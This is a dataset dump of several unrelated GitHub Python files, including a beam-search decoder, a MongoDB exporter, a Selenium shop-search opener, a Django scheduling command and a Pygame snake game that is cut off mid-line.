image_patch_len:, image_patch_len:]\n else:\n curr_attention_mask = curr_attention_mask[:, :,\n :,image_patch_len:]\n\n new_hidden_states , new_encoded_layers = self.encode(curr_embeds , curr_attention_mask , history_states=prev_embedding , prev_encoded_layers=prev_encoded_layers , discard_image=discard_image , text_len=text_len)\n last_hidden = new_hidden_states[:, -1:, :]\n prediction_scores = self.mlm_score(last_hidden)\n log_scores = nn.functional.log_softmax(\n prediction_scores, dim=-1)\n if forbid_word_mask is not None:\n log_scores += (forbid_word_mask * -10000.0)\n if self.min_len and (next_pos-input_length+1 <= self.min_len):\n log_scores[:, :, self.eos_id].fill_(-10000.0)\n kk_scores, kk_ids = torch.topk(log_scores, k=K)\n if len(total_scores) == 0:\n k_ids = torch.reshape(kk_ids, [batch_size, K])\n back_ptrs = torch.zeros(batch_size, K, dtype=torch.long)\n k_scores = torch.reshape(kk_scores, [batch_size, K])\n else:\n last_eos = torch.reshape(\n beam_masks[-1], [batch_size * K, 1, 1])\n last_seq_scores = torch.reshape(\n total_scores[-1], [batch_size * K, 1, 1])\n kk_scores += last_eos * (-10000.0) + last_seq_scores\n kk_scores = torch.reshape(kk_scores, [batch_size, K * K])\n k_scores, k_ids = torch.topk(kk_scores, k=K)\n back_ptrs = torch.div(k_ids, K).long()\n kk_ids = torch.reshape(kk_ids, [batch_size, K * K])\n k_ids = torch.gather(kk_ids, 1, k_ids)\n step_back_ptrs.append(back_ptrs)\n step_ids.append(k_ids)\n beam_masks.append(torch.eq(k_ids, self.eos_id).float())\n total_scores.append(k_scores)\n\n def first_expand(x):\n input_shape = list(x.size())\n expanded_shape = input_shape[:1] + [1] + input_shape[1:]\n x = torch.reshape(x, expanded_shape)\n repeat_count = [1, K] + [1] * (len(input_shape) - 1)\n x = x.repeat(*repeat_count)\n x = torch.reshape(x, [input_shape[0] * K] + input_shape[1:])\n return x\n\n def select_beam_items(x, ids):\n id_shape = list(ids.size())\n id_rank = len(id_shape)\n assert len(id_shape) == 2\n x_shape = list(x.size())\n x = torch.reshape(x, [batch_size, K] + x_shape[1:])\n x_rank = len(x_shape) + 1\n assert x_rank >= 2\n if id_rank < x_rank:\n ids = torch.reshape(\n ids, id_shape + [1] * (x_rank - id_rank))\n ids = ids.expand(id_shape + x_shape[1:])\n y = torch.gather(x, 1, ids)\n y = torch.reshape(y, x_shape)\n return y\n\n is_first = (prev_embedding is None)\n if prev_embedding is None:\n prev_embedding = first_expand(curr_embeds[:, :-1, :])\n else:\n prev_embedding = torch.cat(\n (prev_embedding, curr_embeds[:, :-1, :]), dim=1)\n prev_embedding = select_beam_items(\n prev_embedding, back_ptrs)\n\n if prev_encoded_layers is None:\n prev_encoded_layers = [first_expand(\n x[:, :-1, :]) for x in new_encoded_layers]\n else:\n prev_encoded_layers = [torch.cat((x[0], x[1][:, :-1, :]), dim=1)\n for x in zip(prev_encoded_layers, new_encoded_layers)]\n prev_encoded_layers = [select_beam_items(\n x, back_ptrs) for x in prev_encoded_layers]\n curr_ids = torch.reshape(k_ids, [batch_size * K, 1])\n if is_first:\n co_masks = first_expand(co_masks)\n mask_ids = first_expand(mask_ids)\n cur_ids = first_expand(cur_ids)\n image_embeds = first_expand(image_embeds)\n position_ids = first_expand(position_ids)\n cur_ids = torch.cat((cur_ids , curr_ids), dim=1)\n if use_segment_ids: segment_ids = first_expand(segment_ids)\n else :\n cur_ids = select_beam_items(cur_ids , back_ptrs)\n cur_ids = torch.cat((cur_ids , curr_ids), dim=1)\n # segment_ids = select_beam_items(segment_ids , back_ptrs)\n\n if self.forbid_duplicate_ngrams:\n wids = step_ids[-1].tolist()\n ptrs = step_back_ptrs[-1].tolist()\n if is_first:\n partial_seqs = []\n for b in range(batch_size):\n for k in range(K):\n partial_seqs.append([wids[b][k]])\n else:\n new_partial_seqs = []\n for b in range(batch_size):\n for k in range(K):\n new_partial_seqs.append(\n partial_seqs[ptrs[b][k] + b * K] + [wids[b][k]])\n partial_seqs = new_partial_seqs\n\n def get_dup_ngram_candidates(seq, n):\n cands = set()\n if len(seq) < n:\n return []\n tail = seq[-(n-1):]\n if self.forbid_ignore_set and any(tk in self.forbid_ignore_set for tk in tail):\n return []\n for i in range(len(seq) - (n - 1)):\n mismatch = False\n for j in range(n - 1):\n if tail[j] != seq[i + j]:\n mismatch = True\n break\n if (not mismatch) and not(self.forbid_ignore_set and (seq[i + n - 1] in self.forbid_ignore_set)):\n cands.add(seq[i + n - 1])\n return list(sorted(cands))\n\n if len(partial_seqs[0]) >= self.ngram_size:\n dup_cands = []\n for seq in partial_seqs:\n dup_cands.append(\n get_dup_ngram_candidates(seq, self.ngram_size))\n if max(len(x) for x in dup_cands) > 0:\n if buf_matrix is None:\n vocab_size = list(log_scores.size())[-1]\n buf_matrix = np.zeros(\n (batch_size * K, vocab_size), dtype=float)\n else:\n buf_matrix.fill(0)\n for bk, cands in enumerate(dup_cands):\n for i, wid in enumerate(cands):\n buf_matrix[bk, wid] = 1.0\n forbid_word_mask = torch.tensor(\n buf_matrix, dtype=log_scores.dtype)\n forbid_word_mask = torch.reshape(\n forbid_word_mask, [batch_size * K, 1, vocab_size]).cuda()\n else:\n forbid_word_mask = None\n next_pos += 1\n\n total_scores = [x.tolist() for x in total_scores]\n step_ids = [x.tolist() for x in step_ids]\n step_back_ptrs = [x.tolist() for x in step_back_ptrs]\n traces = {'pred_seq': [], 'scores': [], 'wids': [], 'ptrs': []}\n for b in range(batch_size):\n scores = [x[b] for x in total_scores]\n wids_list = [x[b] for x in step_ids]\n ptrs = [x[b] for x in step_back_ptrs]\n traces['scores'].append(scores)\n traces['wids'].append(wids_list)\n traces['ptrs'].append(ptrs)\n last_frame_id = len(scores) - 1\n for i, wids in enumerate(wids_list):\n if all(wid == self.eos_id for wid in wids):\n last_frame_id = i\n break\n max_score = -math.inf\n frame_id = -1\n pos_in_frame = -1\n for fid in range(last_frame_id + 1):\n for i, wid in enumerate(wids_list[fid]):\n if wid == self.eos_id or fid == last_frame_id:\n s = scores[fid][i]\n if self.length_penalty > 0:\n s /= math.pow((5 + fid + 1) / 6.0,\n self.length_penalty)\n if s > max_score:\n max_score = s\n frame_id = fid\n pos_in_frame = i\n if frame_id == -1:\n traces['pred_seq'].append([0])\n else:\n seq = [wids_list[frame_id][pos_in_frame]]\n for fid in range(frame_id, 0, -1):\n pos_in_frame = ptrs[fid][pos_in_frame]\n seq.append(wids_list[fid - 1][pos_in_frame])\n seq.reverse()\n traces['pred_seq'].append(seq)\n\n def _pad_sequence(sequences, max_len, padding_value=0):\n trailing_dims = sequences[0].size()[1:]\n out_dims = (len(sequences), max_len) + trailing_dims\n out_tensor = sequences[0].data.new(*out_dims).fill_(padding_value)\n for i, tensor in enumerate(sequences):\n length = tensor.size(0)\n out_tensor[i, :length, ...] = tensor\n return out_tensor\n\n for k in ('pred_seq', 'scores', 'wids', 'ptrs'):\n ts_list = traces[k]\n if not isinstance(ts_list[0], torch.Tensor):\n dt = torch.float if k == 'scores' else torch.long\n ts_list = [torch.tensor(it, dtype=dt) for it in ts_list]\n traces[k] = _pad_sequence(\n ts_list, max_length, padding_value=0).to(device)\n\n return traces","repo_name":"AlibabaResearch/DAMO-ConvAI","sub_path":"pace/pace/modules/pace_module.py","file_name":"pace_module.py","file_ext":"py","file_size_in_byte":33876,"program_lang":"python","lang":"en","doc_type":"code","stars":781,"dataset":"github-code","pt":"90"} +{"seq_id":"20541407335","text":"import json\nfrom pymongo import MongoClient\nimport os\n# pprint library is used to make the output look more pretty\nfrom pprint import pprint\nimport csv\n# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string\nclient = MongoClient(os.getenv('MONGO_URI'))\ndb=client.mantiser\n# Issue the serverStatus command and print the results\n#serverStatusResult=db.command(\"serverStatus\")\n#pprint(serverStatusResult)\n\n\ndef cars():\n f = open(\"results.json\", \"a\")\n result=db.result_car.find()\n f.write(\"[\")\n for doc in result:\n f.write(json.dumps(doc)+\",\\n\")\n f.write(\"{}\")\n f.write(\"]\")\n\n\ndef convertJsonToExcel():\n with open('results.json') as json_file:\n jsondata = json.load(json_file)\n \n data_file = open('jsonoutput.csv', 'w', newline='')\n csv_writer = csv.writer(data_file)\n \n count = 0\n for data in jsondata:\n if count == 0:\n header = data.keys()\n csv_writer.writerow(header)\n count += 1\n csv_writer.writerow(data.values())\n \n data_file.close()\n \n\n#cars()\nconvertJsonToExcel()","repo_name":"mantiser-com/upload","sub_path":"code/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"4396573346","text":"# Products searcher~\nfrom selenium import webdriver\nimport pyautogui\n# edge's webdriver need to update with version!!\n\ndef OpenDriver():\n # executable_path varies from person to person!!\n driver = webdriver.Edge(executable_path=\"X:\\\\edge_driver\\\\msedgedriver.exe\")\n driver.maximize_window\n return driver\n\ndef Error(type):\n if (type == \"Input\"):\n print(\"Input Error, but still help tou to find products.\")\n elif (type == \"Shop\"):\n print(\"There is currently no such online shop to search, or your input is wrong~\")\n else:\n print(\"! Error !\")\n\n\n# ----------------------------------------------------------\n# Main program\n# ----------------------------------------------------------\n# Let user input what they want.\nprint(\"----------\")\nwant = input(\"Want to find... :\")\n\nif (want.replace(\" \", \"\") != \"\"):\n\n money_range = input(\"Whether to open the price range(input \\\"y\\\" or \\\"n\\\" ):\")\n checkYsame = money_range == \"y\" or money_range == \"Y\"\n checkNsame = money_range == \"n\" or money_range == \"N\"\n checkYnt = money_range != \"y\" and money_range != \"Y\"\n checkNnt = money_range != \"n\" and money_range != \"N\"\n\n if checkYsame:\n miniprice = input(\"The lowest price you want... :\")\n maxprice = input(\"The highest price you want... :\")\n elif checkNsame:\n # Won't do anything.\n skip = 1 \n else :\n print(\"Input Error - seems \\\"n\\\" to find products.\")\n\n store = input(\"Want to search in... { 1.shopee、2.momo、3.ruten、4.Amazon(no price range)、5.Above of all } --- input serial number:\")\n\n if (store == \"1\") or (store == \"1.\"):\n driver = OpenDriver()\n if checkNsame or checkYnt:\n if (checkYnt and checkNnt):\n Error(\"Input\")\n driver.get(f\"https://shopee.tw/search?keyword={want}\")\n else:\n driver.get(f\"https://shopee.tw/search?keyword={want}&maxPrice={maxprice}&minPrice={miniprice}\")\n print(\"Succeed\")\n\n elif (store == \"2\") or (store == \"2.\"):\n driver = OpenDriver()\n if checkNsame or checkYnt:\n if (checkYnt and checkNnt):\n Error(\"Input\")\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}\")\n else:\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}&_advPriceS={miniprice}&_advPriceE={maxprice}\")\n print(\"Succeed\")\n\n elif (store == \"3\") or (store == \"3.\"):\n driver = OpenDriver()\n if checkNsame or checkYnt:\n if (checkYnt and checkNnt):\n Error(\"Input\")\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}\")\n else:\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}&prc.now={miniprice}-{maxprice}\")\n print(\"Succeed\")\n\n elif (store == \"4\") or (store == \"4.\"):\n driver = OpenDriver()\n if checkYsame:\n print(\"There is currently no price query function, but it still helps you find products.\")\n elif checkNnt:\n Error(\"Input\")\n driver.get(f\"https://www.amazon.com/s?k={want}\")\n print(\"Succeed\")\n\n elif (store == \"5\") or (store == \"5.\"):\n page = 1\n driver = OpenDriver()\n \n if checkNsame:\n driver.get(f\"https://shopee.tw/search?keyword={want}\")\n\n #[1]:click Ctrl + T to add new page\n pyautogui.hotkey('ctrl', 't', interval=0.1) #[1]\n #[2]:switch webdriver's window handle\n driver.switch_to.window(driver.window_handles[page]) #[2]\n #[3]:remind that: page+1\n page+=1 #[3]\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}\")\n\n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}\")\n \n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.amazon.com/s?k={want}\")\n\n elif checkYsame:\n driver.get(f\"https://shopee.tw/search?keyword={want}&maxPrice={maxprice}&minPrice={miniprice}\")\n \n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}&_advPriceS={miniprice}&_advPriceE={maxprice}\")\n\n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}&prc.now={miniprice}-{maxprice}\")\n \n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.amazon.com/s?k={want}\")\n print(\"Succeed\")\n else :\n Error(\"Shop\")\n\nelif (want.replace(\" \", \"\") == \"\"):\n Error(\"\")\n\nprint(\"----------\")","repo_name":"opda0887/online_shop_opener-py","sub_path":"online_shop_EN.py","file_name":"online_shop_EN.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"3074960363","text":"menu_item = 0\nlista =[]\nwhile menu_item != 5:\n\tprint (\"-----------------------------------\")\n\tprint (\"1. Print the list\")\n\tprint (\"2. Add an item to the list\")\n\tprint (\"3. Remove an item from the list\")\n\tprint (\"4. Change an item in the list\")\n\tprint (\"5. Quit\")\n\tmenu_item = int(input(\"Choose an option: \"))\n\tif menu_item == 1:\n\t\tcurrent = 0\n\t\tif len(lista)> 0:\n\t\t\twhile current < len(lista):\n\t\t\t\tprint (current, \".\", lista[current])\n\t\t\t\tcurrent = current + 1\n\t\telse:\n\t\t\tprint (\"Nothing in the list\")\n\telif menu_item == 2:\n\t\titem_add = input(\"What's the item you want to add?: \")\n\t\tlista.append(item_add)\n\telif menu_item == 3:\n\t\tdelete_a = input(\"What is the name of the item you want to remove?: \")\n\t\tif delete_a in lista:\n\t\t\tlista.remove(delete_a)\n\t\telse:\n\t\t\tprint (\"No such item\")\n\telif menu_item == 4:\n\t\told= input(\"What is the name of item you wish to change?: \")\n\t\tif old in lista:\n\t\t\tnew_number = lista.index(old)\n\t\t\tnew = input(\"What's the new name of the item?: \")\n\t\t\tlista[new_number]= new\n\t\telse:\n\t\t\tprint (\"No such item\")\n\n \n","repo_name":"Kanac/Python","sub_path":"add_remove_list.py","file_name":"add_remove_list.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74483595822","text":"import csv\n\nfrom .math import *\n\ndef readfile(source):\n \n ndict={}\n \n with open(source,newline='') as file:\n reader = csv.reader(file,delimiter=',')\n for row in reader:\n if ' '==row[-1] or ''==row[-1]:\n x=row\n x.pop()\n ndict[x[-1]]=x[:-1]\n else:\n ndict[row[-1]]=row[:-1]\n \n return ndict\n\ndef readerror(source,mode,xlen=1,ylen=1):\n \n with open(source,newline='') as file:\n reader = list(csv.reader(file,delimiter=','))\n \n if mode=='multi':\n x=reader[1]\n y=reader[0]\n \n if len(x)<4:\n ex=[]\n for i in range(xlen):\n ex.append(reader[1][1])\n else:\n ex=x\n if len(y)<4:\n why=[]\n for j in range(ylen):\n why.append(reader[0][1])\n else:\n why=y\n \n \n return ex[1:-1],why[1:-1]\n else:\n x,y=[],[]\n for i in range(xlen):\n x.append(reader[1][1])\n for j in range(ylen):\n y.append(reader[0][1])\n return x,y \n \n\n# def points():\n# a = int(input('Number of Points: ')) #Establishing the number of data points overall\n# b = int(input('Number of X readings: ')) #Entering the various X values, factoring multiple readings\n# xs,ys,xerrs,yerrs=[],[],[],[]\n \n# constant_x_error=input('Is X Error Constant (Y/N)')\n# constant_y_error=input('Is Y Error Constant (Y/N)')\n \n# if constant_y_error=='Y' or 'y':\n# yerr=float(input('Error on Y:'))\n \n# if constant_x_error=='Y' or 'y':\n# xerr=float(input('Error on X:'))\n \n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n\n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(xerr)\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n# else:\n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n\n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(float(input('X: ')))\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n# else:\n# if constant_x_error=='Y' or 'y':\n# xerr=float(input('Error on Y:'))\n \n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n# yerr=float(input('Error on Y:'))\n \n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(xerr)\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n# xerr=float(input('X Error: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n# else:\n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n# yerr=float(input('Error on Y:'))\n \n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(float(input('X: ')))\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n# xerr=float(input('X Error: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n\n# return xs,ys,xerrs,yerrs\n","repo_name":"Chueyyew/autoplot","sub_path":"functions/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"5639167729","text":"import numpy as np\nimport torch\n\nfrom ..config.config import PyTorchConfig\n\nclass GaussianCovariates:\n \"\"\" A class for generating normally distributed covariates. \"\"\"\n\n @staticmethod\n def generate_covariates_matrix(\n n, d, pytorch_config = PyTorchConfig(), covariance_matrix = None):\n \"\"\" Parameters:\n n The number of data points.\n d The number of covariates per data point.\n covariance_matrix A d x d numpy covariance matrix. If none,\n identity matrix is assumed.\n pytorch_config A gen.config.PyTorchConfig object. \"\"\"\n dtype = pytorch_config.dtype\n device = pytorch_config.device\n\n if covariance_matrix is None:\n # Assume identity covariance matrix.\n return torch.randn(n, d, dtype = dtype, device = device)\n\n if list(covariance_matrix.shape) != [d, d]:\n raise ValueError(\"The covariance Matrix should be \" \\\n + str(d) + \" x \" + str(d) + \".\")\n\n mean = torch.zeros(d, dtype = dtype, device = device)\n covariance_matrix = torch.tensor(\n covariance_matrix, device = device, dtype = dtype)\n\n multivar_norm = torch.distributions.MultivariateNormal(\n covariance_matrix = covariance_matrix, loc = mean)\n\n samples = torch.zeros(n, d, device = device, dtype = dtype)\n # The below way to filling up the dataset is to save cuda memory.\n # torch multivariate normal rng somehow uses up too much memory.\n for i in range(n):\n samples[i,:] = multivar_norm.rsample((1,))\n\n return samples\n\n","repo_name":"TomasVaskevicius/implicit_sparsity_neurips2019","sub_path":"code/core/data/gaussian_covariates.py","file_name":"gaussian_covariates.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"27849946368","text":"from django.core.management.base import BaseCommand\nfrom planning.src.Composer import Composer\nfrom planning.models import MessageQueue, Parameters\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n message_queue = MessageQueue.object.filter(state='pending')\n for message in message_queue:\n if message:\n composer = Composer(message)\n try:\n date_student = Parameters.object.filter(key='date_student').get(message=message.id).value\n except Parameters.DoesNotExist:\n date_student = False\n try:\n date_profesor = Parameters.object.filter(key='date_profesor').get(message=message.id).value\n except Parameters.DoesNotExist:\n date_profesor = False\n try:\n type_guard = Parameters.object.filter(key='guard').get(message=message.id).value\n except (Parameters.MultipleObjectsReturned, Parameters.DoesNotExist):\n type_guard = False\n algorithm_student = Parameters.object.filter(key='alg_student').filter(message=message.id)\n algorithm_profesor = Parameters.object.filter(key='alg_profesor').filter(message=message.id)\n\n guard = composer.compose(algorithm_profesor, algorithm_student, type_guard, date_profesor, date_student)\n\n if -1 not in guard:\n message.percent = 100\n message.state = 'processed'\n message.save()\n else:\n message.state = 'error'\n message.save()\n\n","repo_name":"aanunez96/automatic-scheduling-tool-on-call-with-various-algorithms","sub_path":"api/planning/management/commands/generateguard.py","file_name":"generateguard.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"14653403544","text":"string = 'aaaa'\n\ndef pairStar(a):\n if len(a) == 0:\n return\n if len(a) == 1:\n return a\n if a[0] == a[1]:\n return a[0] + '*' + pairStar(a[1:])\n else:\n return a[0] + pairStar(a[1:])\n \nprint(pairStar(string))\n# output: 'a*a*a*a'\n","repo_name":"Neon2k2/PythonDSA","sub_path":"Recursion/Assignment/AddingStar.py","file_name":"AddingStar.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"41605116027","text":"import glob\nimport argparse\nimport pysam\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n\ndef get_reads_mapped(bamfile):\n\n\tbamfile = pysam.AlignmentFile(bamfile, 'rb')\n\tref_reads_mapped = {}\n\t#Get reads mapped to each reference\n\tfor genome in bamfile.references:\n\t\tgenome_id = genome.split(\"_\")[-1]\n\t\treads_mapped = sum(1 for read in bamfile.fetch(genome))\n\t\tref_reads_mapped[genome_id] = reads_mapped\n\t\n\treturn ref_reads_mapped\n\n\ndef plot_hits_heatmap(hits_by_sample_df):\n\n\tfig, ax = plt.subplots(1,1, figsize=(6,5))\n\tsns.heatmap(hits_by_sample_df, cmap='YlGnBu', robust=True, ax=ax)\n\tplt.tight_layout()\n\tfig.savefig('marref_prophages_tara_oceans_heatmap.pdf')\n\t\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser(description='Parse indexed bam files and generate heatmap of hits per sample to the reference sequences')\n\tparser.add_argument('bamfile_dir', help='Directory with the indexed bamfiles to parse')\n\targs = parser.parse_args()\n\t\n\t#Get hits to reference genomes for each sample\n\thits_per_sample = {}\n\tfor bamfile in glob.glob(args.bamfile_dir + \"/*.bam\"):\n\t\tsample = bamfile.split(\"/\")[-1][:-4]\n\t\thits = get_reads_mapped(bamfile)\n\t\thits_per_sample[sample] = hits\n\n\t#Combine hits for each sample into a dataframe\n\thits_per_sample_df = pd.DataFrame.from_dict(hits_per_sample)\n\tprint(hits_per_sample_df.head())\n\n\t#Plot heatmap of hits to reference sequences for all samples\n\tplot_hits_heatmap(hits_per_sample_df)\n\n","repo_name":"taylor-oconnell/marine-prophage-hunting","sub_path":"parse_samfiles.py","file_name":"parse_samfiles.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"73371427823","text":"import cv2\n\nclass MyImage:\n def __init__(self, img_name, optional=0):\n self.img = img_name\n self.__name = img_name\n\n def __str__(self):\n return self.__name\n\n\nclass VerifySignature:\n def __init__(self, obj1, obj2):\n self.img1 = MyImage(obj1, 0) # queryImage\n self.img2 = MyImage(obj2, 0) # trainImage\n\n def find(self):\n\n self.img1.img = cv2.cvtColor(self.img1.img, cv2.COLOR_BGR2GRAY)\n self.img2.img = cv2.cvtColor(self.img2.img, cv2.COLOR_BGR2GRAY)\n\n # =============================================================\n # figure, ax = plt.subplots(1, 2, figsize=(16, 8))\n #\n # ax[0].imshow(img1.img, cmap='gray')\n # ax[1].imshow(img2.img, cmap='gray')\n # ==================================================================\n\n # Initiate SIFT detector\n sift = cv2.SIFT_create()\n\n # find the keypoints and descriptors with SIFT\n kp1, des1 = sift.detectAndCompute(self.img1.img, None)\n kp2, des2 = sift.detectAndCompute(self.img2.img, None)\n\n # BFMatcher with default params\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(des1, des2, k=2)\n\n # Apply ratio test\n good = []\n good_without_list = []\n for m, n in matches:\n if m.distance < 0.65 * n.distance:\n good.append([m])\n good_without_list.append(m)\n\n if len(good) >= 8:\n return True\n else:\n return False\n","repo_name":"viveknimbolkar/cheque-detection","sub_path":"model/signature_verification.py","file_name":"signature_verification.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"13306380747","text":"import os\nimport sys\n\n#\n# (C) Copytight 2017 Marek Bielawski\n# addClass\n#\n\nnewLine = str('\\n')\n\ndef sexyComment(lines) :\n out = '/*' + newLine\n for line in lines:\n out += ' * ' + line + newLine\n out += ' */' + newLine\n return out\n\nif len( sys.argv ) < 2:\n print( \"too few arguments\" )\n quit()\nparamName = sys.argv[1];\nparamArr = paramName.split('::')\n\nhPath = 'Code/' + '/'.join(paramArr) + '.h'\ncppPath = 'Code/' + '/'.join(paramArr) + '.cpp'\nif os.path.isfile( hPath ) or os.path.isfile(cppPath) :\n print ( \"class {} allready eists\".format(paramName) )\n quit()\nclassName = paramArr[-1] \nnamespaceArr = paramArr[:-1]\nnamespaceStart = ''\nnamespaceEnd = newLine\nguardName = '_'.join(paramArr).upper() + \"_DEF\"\nfor namespace in namespaceArr:\n namespaceStart += 'namespace ' + namespace + ' {' + newLine\n namespaceEnd += '}' + newLine\nclassStart = 'class ' + className + newLine + '{' + newLine\nclassEnd = '};' + newLine\ncomment = sexyComment([\n \"(C) Copytight 2017 Marek Bielawski\",\n paramName\n ])\ninclude = \"#include <\" + '/'.join(paramArr) + '.h>' + newLine\nheaderContent = \"#ifndef \" + guardName + newLine + \"#define \" + guardName + newLine\nheaderContent += comment + namespaceStart + newLine\nheaderContent += classStart + classEnd + namespaceEnd + \"#endif\" + newLine\n \ncppContent = include + comment + namespaceStart + newLine + namespaceEnd\nhFile = open(hPath, \"w\")\ncppFile = open(cppPath, \"w\")\nhFile.write(headerContent)\ncppFile.write(cppContent)\nhFile.close()\ncppFile.close()\n\n","repo_name":"mare85/code","sub_path":"Game1/scripts/addClass.py","file_name":"addClass.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"12713701112","text":"# -*-coding:utf-8-*-\r\n# by Alan_Correa\r\n\r\nimport pygame\r\nfrom pygame.locals import*\r\nfrom random import randint\r\nimport ctypes\r\n\r\nctypes.windll.kernel32.FreeConsole()\r\n\r\ndef on_grid_random():\r\n x = randint(0, 590)\r\n y = randint(0, 590)\r\n return (x//10 * 10, y//10 * 10)\r\n\r\ndef collision_apple(c1, c2):\r\n return (c1[0] == c2[0] and c1[1] == c2[1])\r\n\r\nUP = 0\r\nRIGHT = 1\r\nDOWN = 2\r\nLEFT = 3\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((600, 600))\r\npygame.display.set_caption(\"Snake\")\r\n\r\nsnake = [(200, 200), (210, 200), (220, 200)]\r\nsnake_skin = pygame.Surface((10, 10))\r\nsnake_skin.fill((255, 255, 255))\r\n\r\napple_pos = on_grid_random()\r\napple = pygame.Surface((10, 10))\r\napple.fill((255, 0, 0))\r\n\r\nfont = pygame.font.SysFont('Arial', 18)\r\ntext = font.render('Você Perdeu!', True, (0, 255, 0))\r\ntextRect = text.get_rect()\r\ntextRect.center = (600//2, 600//2)\r\n\r\nhight_pad = pygame.Rect(0, -10, 600, 0)#cima\r\nleft_pad = pygame.Rect(600, 0, 610, 600)#esquerda\r\ndown_pad = pygame.Rect(0, 600, 600, 610)#baixo\r\nright_pad = pygame.Rect(-10, 0, 0, 600)#direita\r\npads = (hight_pad, left_pad, down_pad, right_pad)\r\n\r\nmy_direction = LEFT\r\nclock = pygame.time.Clock()\r\n\r\nwhile True:\r\n clock.tick(20)\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n \r\n if event.type == KEYDOWN:\r\n if event.key == K_UP:\r\n my_direction = UP\r\n if event.key == K_DOWN:\r\n my_direction = DOWN\r\n if event.key == K_RIGHT:\r\n my_direction = RIGHT\r\n if event.key == K_LEFT:\r\n my_direction = LEFT\r\n if collision_apple(snake[0], apple_pos):\r\n apple_pos = on_grid_random()\r\n snake.append((0, 0))\r\n \r\n head = pygame.Rect(snake_skin.get_clip())\r\n if head.collidelist(pads) >= 0:\r\n pygame.quit()\r\n \r\n for i in range(len(snake) - 1, 0, -1):\r\n snake[i] = (snake[i-1][0], snake[i-1][1])\r\n \r\n if my_direction == UP:\r\n snake[0] = (snake[0][0], snake[0][1] - 10)\r\n if my_direction == DOWN:\r\n snake[0] = (snake[0][0], snake[0][1] + 10)\r\n if my_direction == RIGHT:\r\n snake[0] = (snake[0][0] + 10, snake[0][1])\r\n if my_direction == LEFT:\r\n snake[0] = (snake[0][0] - 10, 